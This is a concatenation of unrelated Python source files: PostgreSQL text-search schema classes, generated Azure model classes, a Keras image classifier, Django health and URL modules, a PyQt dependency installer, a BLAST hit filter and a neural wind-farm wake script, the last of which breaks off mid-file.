"""Initialize the dictionary of configs by examining the input map
:param schema: schema owning the configurations
:param inconfigs: input YAML map defining the configurations
"""
for key in inconfigs:
if not key.startswith("text search configuration "):
raise KeyError("Unrecognized object type: %s" % key)
tsc = key[26:]
inobj = inconfigs[key]
self[(schema.name, tsc)] = TSConfiguration.from_map(
tsc, schema, inobj
)
class TSDictionary(DbSchemaObject):
"""A text search dictionary definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_dict"
def __init__(
self, name, schema, description, owner, template, options, oid=None
):
"""Initialize the dictionary
:param name: dictionary name (from dictname)
:param schema: schema name (from dictnamespace)
:param description: comment text (from obj_description())
:param owner: owner name (from rolname via dictowner)
:param template: template name (from dicttemplate)
:param options: initialization option string (from dictinitoption)
"""
super(TSDictionary, self).__init__(name, schema, description)
self._init_own_privs(owner, [])
self.template = template
self.options = options
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, dictname AS name, rolname AS owner,
tmplname AS template, dictinitoption AS options,
obj_description(d.oid, 'pg_ts_dict') AS description, d.oid
FROM pg_ts_dict d JOIN pg_ts_template t ON (dicttemplate = t.oid)
JOIN pg_roles r ON (r.oid = dictowner)
JOIN pg_namespace n ON (dictnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, dictname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a dictionary instance from a YAML map
:param name: dictionary name
:param name: schema map
:param inobj: YAML map of the dictionary
:return: dictionary instance
"""
obj = TSDictionary(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("owner", None),
inobj.pop("template", None),
inobj.pop("options", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH DICTIONARY"
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the dictionary
:return: SQL statements
"""
clauses = []
clauses.append("TEMPLATE = %s" % self.template)
if self.options is not None:
clauses.append(self.options)
return [
"CREATE TEXT SEARCH DICTIONARY %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSDictionaryDict(DbObjectDict):
"The collection of text search dictionaries in a database"
cls = TSDictionary
def from_map(self, schema, indicts):
"""Initialize the dictionary of dictionaries by examining the input map
:param schema: schema owning the dictionaries
:param indicts: input YAML map defining the dictionaries
"""
for key in indicts:
if not key.startswith("text search dictionary "):
raise KeyError("Unrecognized object type: %s" % key)
tsd = key[23:]
inobj = indicts[key]
self[(schema.name, tsd)] = TSDictionary.from_map(tsd, schema, inobj)
class TSParser(DbSchemaObject):
"""A text search parser definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_parser"
def __init__(
self,
name,
schema,
description,
start,
gettoken,
end,
headline,
lextypes,
oid=None,
):
"""Initialize the parser
:param name: parser name (from prsname)
:param schema: schema name (from prsnamespace)
:param description: comment text (from obj_description())
:param start: startup function (from prsstart)
:param gettoken: next-token function (from prstoken)
:param end: shutdown function (from prsend)
:param headline: headline function (from prsheadline)
:param lextypes: lextype function (from prslextype)
"""
super(TSParser, self).__init__(name, schema, description)
self._init_own_privs(None, [])
self.start = start
self.gettoken = gettoken
self.end = end
self.headline = headline
self.lextypes = lextypes
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, prsname AS name,
prsstart::regproc AS start, prstoken::regproc AS gettoken,
prsend::regproc AS end, prslextype::regproc AS lextypes,
prsheadline::regproc AS headline,
obj_description(p.oid, 'pg_ts_parser') AS description, p.oid
FROM pg_ts_parser p JOIN pg_namespace n ON (prsnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, prsname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a parser instance from a YAML map
:param name: parser name
:param name: schema map
:param inobj: YAML map of the parser
:return: parser instance
"""
obj = TSParser(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("start", None),
inobj.pop("gettoken", None),
inobj.pop("end", None),
inobj.pop("headline", None),
inobj.pop("lextypes", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH PARSER"
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the parser
:return: SQL statements
"""
clauses = []
for attr in ["start", "gettoken", "end", "lextypes"]:
clauses.append("%s = %s" % (attr.upper(), getattr(self, attr)))
if self.headline is not None:
clauses.append("HEADLINE = %s" % self.headline)
return [
"CREATE TEXT SEARCH PARSER %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSParserDict(DbObjectDict):
"The collection of text search parsers in a database"
cls = TSParser
def from_map(self, schema, inparsers):
"""Initialize the dictionary of parsers by examining the input map
:param schema: schema owning the parsers
:param inparsers: input YAML map defining the parsers
"""
for key in inparsers:
if not key.startswith("text search parser "):
raise KeyError("Unrecognized object type: %s" % key)
tsp = key[19:]
inobj = inparsers[key]
self[(schema.name, tsp)] = TSParser.from_map(tsp, schema, inobj)
class TSTemplate(DbSchemaObject):
"""A text search template definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_template"
def __init__(self, name, schema, description, init, lexize, oid=None):
"""Initialize the template
:param name: template name (from tmplname)
:param schema: schema name (from tmplnamespace)
:param description: comment text (from obj_description())
:param init: initialization function (from tmplinit)
:param lexize: lexize function (from tmpllexize)
"""
super(TSTemplate, self).__init__(name, schema, description)
self._init_own_privs(None, [])
self.init = init
self.lexize = lexize
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nspname AS schema, tmplname AS name, p.oid,
tmplinit::regproc AS init, tmpllexize::regproc AS lexize,
obj_description(p.oid, 'pg_ts_template') AS description
FROM pg_ts_template p
JOIN pg_namespace n ON (tmplnamespace = n.oid)
WHERE nspname != 'pg_catalog' AND nspname != 'information_schema'
ORDER BY nspname, tmplname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a template instance from a YAML map
:param name: template name
:param name: schema map
:param inobj: YAML map of the template
:return: template instance
"""
obj = TSTemplate(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("init", None),
inobj.pop("lexize", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH TEMPLATE"
@commentable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the template
:return: SQL statements
"""
clauses = []
if self.init is not None:
clauses.append("INIT = %s" % self.init)
clauses.append("LEXIZE = %s" % self.lexize)
return [
"CREATE TEXT SEARCH TEMPLATE %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
class TSTemplateDict(DbObjectDict):
"The collection of text search templates in a database"
cls = TSTemplate
def from_map(self, schema, intemplates):
"""Initialize the dictionary of templates by examining the input map
:param schema: schema owning the templates
:param intemplates: input YAML map defining the templates
"""
for key in intemplates:
if not key.startswith("text search template "):
raise KeyError("Unrecognized object type: %s" % key)
tst = key[21:]
inobj = intemplates[key]
self[(schema.name, tst)] = TSTemplate.from_map(tst, schema, inobj)
|
py | b40439c1a3693be38855c05889599c19c8b87371 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Optional
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Feline(msrest.serialization.Model):
"""Feline.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
"""
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
}
def __init__(
self,
*,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
**kwargs
):
super(Feline, self).__init__(**kwargs)
self.meows = meows
self.hisses = hisses
class Pet(msrest.serialization.Model):
"""Pet.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
name: str,
**kwargs
):
super(Pet, self).__init__(**kwargs)
self.name = name
class Cat(Pet, Feline):
"""Cat.
All required parameters must be populated in order to send to Azure.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
:param name: Required.
:type name: str
:param likes_milk:
:type likes_milk: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'likes_milk': {'key': 'likesMilk', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
likes_milk: Optional[bool] = None,
**kwargs
):
super(Cat, self).__init__(name=name, meows=meows, hisses=hisses, **kwargs)
self.meows = meows
self.hisses = hisses
self.likes_milk = likes_milk
self.name = name
self.likes_milk = likes_milk
class Error(msrest.serialization.Model):
"""Error.
:param status:
:type status: int
:param message:
:type message: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'int'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[int] = None,
message: Optional[str] = None,
**kwargs
):
super(Error, self).__init__(**kwargs)
self.status = status
self.message = message
class Horse(Pet):
"""Horse.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param is_a_show_horse:
:type is_a_show_horse: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_a_show_horse': {'key': 'isAShowHorse', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
is_a_show_horse: Optional[bool] = None,
**kwargs
):
super(Horse, self).__init__(name=name, **kwargs)
self.is_a_show_horse = is_a_show_horse
class Kitten(Cat):
"""Kitten.
All required parameters must be populated in order to send to Azure.
:param meows:
:type meows: bool
:param hisses:
:type hisses: bool
:param name: Required.
:type name: str
:param likes_milk:
:type likes_milk: bool
:param eats_mice_yet:
:type eats_mice_yet: bool
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'meows': {'key': 'meows', 'type': 'bool'},
'hisses': {'key': 'hisses', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'likes_milk': {'key': 'likesMilk', 'type': 'bool'},
'eats_mice_yet': {'key': 'eatsMiceYet', 'type': 'bool'},
}
def __init__(
self,
*,
name: str,
meows: Optional[bool] = None,
hisses: Optional[bool] = None,
likes_milk: Optional[bool] = None,
eats_mice_yet: Optional[bool] = None,
**kwargs
):
super(Kitten, self).__init__(meows=meows, hisses=hisses, name=name, likes_milk=likes_milk, **kwargs)
self.eats_mice_yet = eats_mice_yet
|
py | b4043a75ae60fa7e23fdb76db26e06f7183b6a59 | """通常の分類。"""
import keras
import keras.preprocessing.image
BATCH_SIZE = 16
def _main():
idg1 = keras.preprocessing.image.ImageDataGenerator(
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
rescale=1. / 255)
idg2 = keras.preprocessing.image.ImageDataGenerator(rescale=1. / 255)
gen1 = idg1.flow_from_directory('data/train_only', target_size=(224, 224), batch_size=BATCH_SIZE)
gen2 = idg2.flow_from_directory('data/test', target_size=(224, 224), batch_size=BATCH_SIZE, shuffle=False)
assert gen1.num_classes == gen2.num_classes
num_classes = gen1.num_classes
base_model = keras.applications.Xception(include_top=False)
for layer in base_model.layers:
if layer.name == 'block14_sepconv1':
break
elif not isinstance(layer, keras.layers.BatchNormalization):
layer.trainable = False
x = base_model.outputs[0]
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dense(num_classes, activation='softmax', kernel_initializer='zeros')(x)
model = keras.models.Model(base_model.inputs, x)
model.summary()
model.compile(
loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.SGD(momentum=0.9, nesterov=True),
metrics=['acc'])
base_lr = 1e-1
main_epochs = 20
lr_list = [base_lr] * main_epochs + [base_lr / 10] * (main_epochs // 2) + [base_lr / 100] * (main_epochs // 2)
callbacks = []
callbacks.append(keras.callbacks.LearningRateScheduler(lambda ep: lr_list[ep]))
callbacks.append(keras.callbacks.CSVLogger('classification_history.tsv', separator='\t'))
model.fit_generator(
generator=gen1,
steps_per_epoch=gen1.samples // gen1.batch_size,
epochs=len(lr_list),
validation_data=gen2,
validation_steps=gen2.samples // gen2.batch_size,
callbacks=callbacks)
def _conv_bn_act(*args, **kwargs):
def _layer(x):
x = keras.layers.Conv2D(*args, **kwargs)(x)
x = keras.layers.BatchNormalization()(x)
x = keras.layers.Activation('relu')(x)
return x
return _layer
if __name__ == '__main__':
_main()
|
py | b4043bcf110bfaeb42dff781079384cb30da494f | import json
import time
from typing import Dict, Union
import redis
from django.conf import settings
from django.http import HttpResponse
if settings.REDIS_URL:
redis_instance = redis.from_url(settings.REDIS_URL, db=0)
else:
redis_instance = None
def health(request):
return HttpResponse("ok", content_type="text/plain")
def stats(request):
stats_response: Dict[str, Union[int, str]] = {}
last_heartbeat = redis_instance.get("POSTHOG_HEARTBEAT") if redis_instance else None
worker_heartbeat = int(time.time()) - int(last_heartbeat) if last_heartbeat else None
if worker_heartbeat and (worker_heartbeat == 0 or worker_heartbeat < 300):
stats_response["worker_heartbeat"] = worker_heartbeat
else:
stats_response["worker_heartbeat"] = "offline"
return HttpResponse(json.dumps(stats_response), content_type="application/json")
|
py | b4043cbdc6594d807631689f5f0bf287bdebd49e | from django.conf.urls import url
from cba_examples.views import button
from cba_examples.views import checkbox
from cba_examples.views import drag_n_drop
from cba_examples.views import edit_text
from cba_examples.views import dnd_select
from cba_examples.views import file_input_1
from cba_examples.views import file_input_2
from cba_examples.views import file_input_3
from cba_examples.views import links
from cba_examples.views import list_1
from cba_examples.views import history
from cba_examples.views import history_2
from cba_examples.views import image
from cba_examples.views import overview
from cba_examples.views import radio
from cba_examples.views import select_1
from cba_examples.views import select_2
from cba_examples.views import select_3
from cba_examples.views import table_1
from cba_examples.views import table_2
from cba_examples.views import tabs_1
from cba_examples.views import textarea_1
from cba_examples.views import textarea_2
from cba_examples.views import text_input_1
from cba_examples.views import text_input_2
urlpatterns = [
url(r'^$', overview.OverviewView.as_view(), name='overview'),
url(r'^button$', button.ButtonView.as_view(), name='button'),
url(r'^checkboxes$', checkbox.CheckboxView.as_view(), name='checkboxes'),
url(r'^dnd-select$', dnd_select.View.as_view(), name='dnd_select'),
url(r'^drag-n-drop$', drag_n_drop.DragnDropView.as_view(), name='drag_n_drop'),
url(r'^edit-text$', edit_text.View.as_view(), name='edit_text'),
url(r'^links$', links.LinksView.as_view(), name='link'),
url(r'^list-1$', list_1.LinksView.as_view(), name='list_1'),
url(r'^file-input-1$', file_input_1.FileInputView.as_view(), name='file_input_1'),
url(r'^file-input-2$', file_input_2.FileInputView.as_view(), name='file_input_2'),
url(r'^file-input-3$', file_input_3.FileInputView.as_view(), name='file_input_3'),
url(r'^history$', history.HistoryView.as_view(), name='history'),
url(r'^history-2$', history_2.View.as_view(), name='history_2'),
url(r'^image$', image.ImageView.as_view(), name='image'),
url(r'^radio$', radio.RadioCheckboxView.as_view(), name='radio'),
url(r'^select-1$', select_1.SelectView.as_view(), name='select_1'),
url(r'^select-2$', select_2.SelectView.as_view(), name='select_2'),
url(r'^select-3$', select_3.SelectView.as_view(), name='select_3'),
url(r'^table-1$', table_1.TableView.as_view(), name='table_1'),
url(r'^table-2$', table_2.TableView.as_view(), name='table_2'),
url(r'^tabs-1$', tabs_1.TabsView.as_view(), name='tabs_1'),
url(r'^textarea-1$', textarea_1.TextAreaView.as_view(), name='textarea_1'),
url(r'^textarea-2$', textarea_2.TextAreaView.as_view(), name='textarea_2'),
url(r'^text-input-1$', text_input_1.TextInputView.as_view(), name='text_input_1'),
url(r'^text-input-2$', text_input_2.TextInputView.as_view(), name='text_input_2'),
]
|
py | b4043d4576b6338884023e770784ad2acc508362 | class ConfigParameters:
"""
Configuration settings names
"""
TABPY_PORT = "TABPY_PORT"
TABPY_QUERY_OBJECT_PATH = "TABPY_QUERY_OBJECT_PATH"
TABPY_STATE_PATH = "TABPY_STATE_PATH"
TABPY_TRANSFER_PROTOCOL = "TABPY_TRANSFER_PROTOCOL"
TABPY_CERTIFICATE_FILE = "TABPY_CERTIFICATE_FILE"
TABPY_KEY_FILE = "TABPY_KEY_FILE"
TABPY_PWD_FILE = "TABPY_PWD_FILE"
TABPY_LOG_DETAILS = "TABPY_LOG_DETAILS"
TABPY_STATIC_PATH = "TABPY_STATIC_PATH"
TABPY_MAX_REQUEST_SIZE_MB = "TABPY_MAX_REQUEST_SIZE_MB"
TABPY_EVALUATE_TIMEOUT = "TABPY_EVALUATE_TIMEOUT"
TABPY_COOKIE = "TABPY_COOKIE"
|
py | b4043ea59ae540a75ac3246dea8cd317733a63e8 | import os
from shutil import copy, move
def copyfiles(src, dst, exclude=[]):
for root, dirs, files in os.walk(src):
dst_root = os.path.relpath(root, start=src)
for file in files:
extension = file.split('.')[-1]
if extension not in exclude:
os.makedirs(os.path.join(dst, dst_root), exist_ok=True)
copy(os.path.join(root, file), os.path.join(dst, dst_root, file))
for d in dirs:
os.makedirs(os.path.join(dst, dst_root, d), exist_ok=True)
def movefiles(src, dst, exclude=[]):
for root, dirs, files in os.walk(src):
dst_root = os.path.relpath(root, start=src)
for file in files:
extension = file.split('.')[-1]
if extension not in exclude:
os.makedirs(os.path.join(dst, dst_root), exist_ok=True)
move(os.path.join(root, file), os.path.join(dst, dst_root, file))
for d in dirs:
os.makedirs(os.path.join(dst, dst_root, d), exist_ok=True) |
py | b4043f1abce4bfac128803e1aa391ebd2a688905 | # -*- coding: UTF-8 -*-
import sys
import os
import qdarkstyle
from PyQt5 import QtGui
from PyQt5.QtCore import QThread, pyqtSignal, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QVBoxLayout, QLabel, QListWidget, QListWidgetItem, QWidget, QHBoxLayout, \
QPushButton, QMessageBox, QTextBrowser, QAction, QApplication
from TkPy3.tkpy3_tools.start import tkpy3_setup
from TkPy3.version import version as tkpy_version
from TkPy3.tkpy3_tools.pip_tools import tkpy_pip
from TkPy3.locale_dirs import images_icon_dir, static_dir
from TkPy3.tkpy3_tools.qt_load import LoadWidget
class InstallThread(QThread):
done = pyqtSignal()
ok = pyqtSignal(str)
package_name = pyqtSignal(str)
falsed = pyqtSignal(str)
def __init__(self, parent=None, *packages):
QThread.__init__(self, parent)
self.packages = packages
def run(self):
pip = tkpy_pip()
for i in self.packages:
self.package_name.emit(i)
if pip.upgrade(i):
self.falsed.emit(i)
else:
self.ok.emit(i)
self.done.emit()
class RelyDialog(QDialog):
def __init__(self):
QDialog.__init__(self)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.resize(800, 400)
self.setWindowTitle(f'TkPy{tkpy_version} 依赖')
self.setWindowIcon(
QIcon(os.path.join(images_icon_dir, 'help_icons', 'tools.png')))
self.layout = QVBoxLayout(self)
self.text_show_label = QLabel()
self.view_list = QListWidget()
self.setLayout(self.layout)
self.get_start()
def get_start(self):
with open(os.path.join(static_dir, 'relys.txt'), encoding='UTF-8') as f:
count = 0
for package_name in f.read().split('\n'):
if package_name:
self.view_list.insertItem(
count, QListWidgetItem(package_name))
count += 1
self.layout.addWidget(self.text_show_label)
self.layout.addWidget(self.view_list)
self.text_show_label.setText('<h4>所有依赖: </h4>')
class InstallDialog(RelyDialog):
def __init__(self):
RelyDialog.__init__(self)
self.setWindowTitle('安装TkPy3的依赖')
self.buttons_frame = QWidget()
self.buttons_layout = QHBoxLayout(self.buttons_frame)
self.buttons_frame.setLayout(self.buttons_layout)
self.installButton = QPushButton()
self.cancelButton = QPushButton()
self.yesnoinstall = False
self.layout.addWidget(self.buttons_frame)
install_packages = []
for i in range(self.view_list.count()):
install_packages.append(self.view_list.item(i).text())
self.install_process = InstallThread(self, *install_packages)
self.init_ui()
def init_ui(self):
self.buttons_layout.addWidget(self.installButton)
self.buttons_layout.addWidget(self.cancelButton)
self.installButton.setText('现在安装所有依赖')
self.cancelButton.setText('取消安装')
self.cancelButton.clicked.connect(self.close)
self.installButton.clicked.connect(self.install_relys)
def closeEvent(self, event: QtGui.QCloseEvent) -> None:
if self.yesnoinstall:
event.accept()
return
res = QMessageBox.question(self, '取消安装', '是否取消安装? \n\
如果你想再次运行安装程序,请在终端运行 \n\npython -m TkPy3.tkpy3_tools.relys')
if res == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def install_relys(self):
def install():
def done():
show_label.setText('<p>安装完成</p>')
exit_button.setDisabled(False)
message.append('安装完成。')
dialog = QDialog()
dialog.resize(600, 600)
dialog.setWindowFlags(Qt.WindowStaysOnTopHint |
Qt.FramelessWindowHint)
dialog.setWindowTitle('TkPy3安装')
layout = QVBoxLayout()
title_label = QLabel()
show_label = QLabel()
message = QTextBrowser()
exit_button = QPushButton()
load_processbar = LoadWidget()
title_label.setText('<h1>TkPy3安装</h1>')
exit_button.setText('退出')
exit_button.setDisabled(True)
layout.addWidget(title_label, 0)
layout.addWidget(show_label)
layout.addWidget(message)
layout.addWidget(exit_button)
message.addAction(QAction(load_processbar))
dialog.setLayout(layout)
install_packages = []
for i in range(self.view_list.count()):
install_packages.append(self.view_list.item(i).text())
self.close()
self.install_process.start()
message.append('开始安装。')
exit_button.clicked.connect(dialog.close)
self.install_process.falsed.connect(
lambda p: message.append(f'Package {p} 安装失败。'))
self.install_process.ok.connect(
lambda p: message.append(f'Package {p} 安装成功。'))
self.install_process.package_name.connect(lambda text: (show_label.setText(
f'<h3>正在安装中... ...</h3><p>正在安装: {text}</p>'), message.append(f'安装 {text}')))
self.install_process.done.connect(done)
dialog.exec_()
res = QMessageBox.question(self, '问题', '是否现在安装所有依赖?')
if res == QMessageBox.No:
return
self.yesnoinstall = True
install()
if __name__ == "__main__":
app = QApplication(sys.argv)
tkpy3_setup(app)
dialog = InstallDialog()
sys.exit(dialog.exec_())
|
py | b4043f7e7f2376babd7d2e6bcdf29b612c97d833 | #!/usr/bin/env python
import logging, os, sys
from argparse import (ArgumentParser, FileType)
from mob_suite.blast import BlastReader
def parse_args():
"Parse the input arguments, use '-h' for help"
parser = ArgumentParser(description='Filter overlapping queries')
parser.add_argument('--infile', type=str, required=True, help='Input file to process')
parser.add_argument('--outdir', type=str, required=True, help='Output directory')
parser.add_argument('--min_overlap', type=str, required=False, help='Minimum bp overlap', default=5)
return parser.parse_args()
def filter_overlaping_records(blast_df, overlap_threshold,contig_id_col,contig_start_col,contig_end_col,bitscore_col):
prev_contig_id = ''
prev_index = -1
prev_contig_start = -1
prev_contig_end = -1
prev_score = -1
filter_indexes = list()
exclude_filter = dict()
for index, row in blast_df.iterrows():
contig_id = row['sseqid']
contig_start = row['sstart']
contig_end = row['send']
score = row['bitscore']
if prev_contig_id == '':
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
continue
if contig_id != prev_contig_id:
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
continue
if (contig_start >= prev_contig_start and contig_start <= prev_contig_end) or (contig_end >= prev_contig_start and contig_end <= prev_contig_end):
overlap = abs(contig_start - prev_contig_end)
if overlap > overlap_threshold:
if prev_score > score:
filter_indexes.append(index)
else:
filter_indexes.append(prev_index)
prev_index = index
prev_contig_id = contig_id
prev_contig_start = contig_start
prev_contig_end = contig_end
prev_score = score
for index in exclude_filter:
filter_indexes.append(index)
indexes = dict()
for i in blast_df.iterrows():
indexes[i[0]] = ''
blast_df.drop(filter_indexes, inplace=True)
return blast_df.reset_index(drop=True)
def fixStart(blast_df):
for index, row in blast_df.iterrows():
sstart = blast_df.at[index, 'sstart']
send = blast_df.at[index, 'send']
# print "{}\t{}".format(sstart,send)
if send < sstart:
temp = sstart
blast_df.at[index, 'sstart'] = send
blast_df.at[index, 'send'] = temp
# print "====>{}\t{}".format(self.blast_df.at[index, 'sstart'], self.blast_df.at[index, 'send'])
qstart = blast_df.at[index, 'qstart']
qend = blast_df.at[index, 'qend']
if qend < qstart:
temp = qstart
blast_df.at[index, 'qstart'] = qend
blast_df.at[index, 'qend'] = temp
return blast_df
def filter_blast(blast_results_file, min_ident, min_cov, evalue, overlap):
if os.path.getsize(blast_results_file) == 0:
return dict()
blast_df = BlastReader(blast_results_file).df
blast_df = blast_df.loc[blast_df['pident'] >= min_ident]
blast_df = blast_df.loc[blast_df['qcovhsp'] >= min_cov]
blast_df = fixStart(blast_df)
blast_df = blast_df.sort_values(['sseqid','sstart', 'send', 'bitscore'], ascending=[True, True, True, False])
blast_df = blast_df.reset_index(drop=True)
size = str(len(blast_df))
prev_size = 0
while size != prev_size:
blast_df = filter_overlaping_records(blast_df, overlap, 'sseqid', 'sstart', 'send', 'bitscore')
prev_size = size
size = str(len(blast_df))
return blast_df
def main():
logging.info('Running plasmid detector v. {}'.format('0.1'))
args = parse_args()
if not args.infile:
logging.info('Error, no blast file specified, please specify one')
sys.exit()
if not args.outdir:
logging.info('Error, no output directory specified, please specify one')
sys.exit()
if not os.path.isdir(args.outdir):
os.mkdir(args.outdir, 0o755)
blast_file = args.infile
base_file_name = os.path.splitext(os.path.basename(blast_file))[0]
out_dir = args.outdir
blast_results_file = os.path.join(out_dir, base_file_name+'_blast_results.txt')
processed_blast_results = filter_blast(blast_file, 95, 95, 0.00001, 5)
if isinstance(processed_blast_results,dict):
results_fh = open(blast_results_file, 'w')
results_fh.write('')
results_fh.close()
else:
processed_blast_results.to_csv(blast_results_file, sep='\t', header=True, line_terminator='\n', index=False)
main() |
py | b4044064fc639f642f9746120c32a9209d0d1cb8 |
rx=str((input ("emt")))
print(rx) |
py | b40440a2ef1da75c8268f164ae39d7748639425c | from neuralWake import *
from optimisation import *
import synth_and_train as st
def main():
# TRAIN
if train_net == 1:
# Start trainingtimer
t0 = time.time()
# Create the dataset
X_train, X_val, X_test, y_train, y_val, y_test = st.create()
# Set neural model
model = wakeNet().to(device)
if parallel == True and device == "cpu":
# Parallel CPU training
print("Training on parallel CPU cores...")
# Feed domain points to train the model
lazy_results = []
for pixel in range(rows):
lazy_result = dask.delayed(st.training)(
pixel, X_train, X_val, X_test, y_train, y_val, y_test, model
)
lazy_results.append(lazy_result)
results = dask.compute(*lazy_results, num_workers=para_workers)
else:
# Serial CPU tarining (or GPU training depending on set device)
print("Training...")
# Feed domain points to train the model
for pixel in range(rows):
st.training(pixel, X_train, X_val, X_test, y_train, y_val, y_test, model)
# End training timer
t1 = time.time()
print("Training took: ", int(t1 - t0), " seconds")
# Save model weights
torch.save(model, weights_path)
# TEST
else:
# Sets test case value
test = int(input("Please enter the test case number (1-4): "))
if test == 1:
# Single and multiple wake comparisons
# Recommeded denoise=7 (in info.json)
# Single
xs = np.array([1 * D])
ys = np.array([1 * D])
yws = [-30]
compare(
plots=True,
yws=yws,
ws=12,
ti=0.12,
xs=xs,
ys=ys,
print_times=True,
single=False,
)
# Multiple
xs = np.array([1*D, 1*D, 1*D,
4.5*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D])
ys = np.array([1*D, 3*D, 5*D,
2*D, 4*D, 6*D,
1*D, 3*D, 5*D])
yws = [30, -30, 30, -30, 30, -30, 30, -30, 30, -30]
# Case layout (yaw)
xs = np.array([0, 100, 500, 500, 2500, 2500])
ys = np.array([600, 1250, 1000, 250, 500, 0])
yws = np.array([0, 0, 0, 0, 0, 0])
compare(
plots=True,
yws=yws,
ws=11,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False
)
# Case A (yaw)
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
ys = np.array([1*D, 7*D, 1*D, 7*D, 1*D, 7*D])
yws = np.array([26, 26, 20, 20, 0, 0])
compare(
plots=True,
yws=yws,
ws=7,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False)
# Case B (yaw)
xs = np.array([1*D, 1*D, 1*D, 4.5*D, 4.5*D,
8*D, 8*D, 8*D, 11.5*D, 11.5*D,
15*D, 15*D, 15*D, 18.5*D, 18.5*D])
ys = np.array([1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D,
1*D, 5*D, 9*D, 3*D, 7*D])
yws = np.array([25, 24, 24.5, 24.5, 24, 19, 18, 18, 18, 18, 0, 1, 1, 0, 0])
compare(
plots=True,
yws=yws,
ws=7,
ti=0.05,
xs=xs,
ys=ys,
print_times=True,
single=False
)
# Multiple
xs = np.array([1*D, 1*D,
8*D, 8*D])
ys = np.array([1*D, 5*D,
1*D, 5*D])
yws = [30, 30, -30, -30]
compare(
plots=True,
yws=yws,
ws=6,
ti=0.12,
xs=xs,
ys=ys,
print_times=True)
if test == 2:
# Superposition test
# Recommeded denoise=7 (in info.json)
# SOS 1
ys = np.array([0, 0, 0, 4 * D, 4 * D, 4 * D])
xs = np.array([1 * D, 8 * D, 15 * D, 1 * D, 8 * D, 15 * D])
yws = np.array([0, 0, 0, 0, 0, 0])
compare(plots=True, yws=yws, ws=11, ti=0.12, xs=xs, ys=ys, print_times=True)
# SOS 2
ys = np.array([0, 1 * D, 0.5 * D])
xs = np.array([1 * D, 1 * D, 4 * D])
yws = np.array([0, 0, 0])
compare(plots=True, yws=yws, ws=11, ti=0.12, xs=xs, ys=ys, print_times=True)
if test == 3:
# Yaw Optimisation
xs = np.array([1*D, 5.762*D])
ys = np.array([1*D, 1*D])
print("Yaw vs power study layout:")
compare(plots=True, yws=[0, 0], ws=9, ti=0.1, xs=xs, ys=ys, print_times=True)
yawVsPowerContour(ws=9, ti=0.1, xs=xs, ys=ys)
input()
# Case A (yaw)
xs = np.array([1*D, 1*D, 8*D, 8*D, 15*D, 15*D])
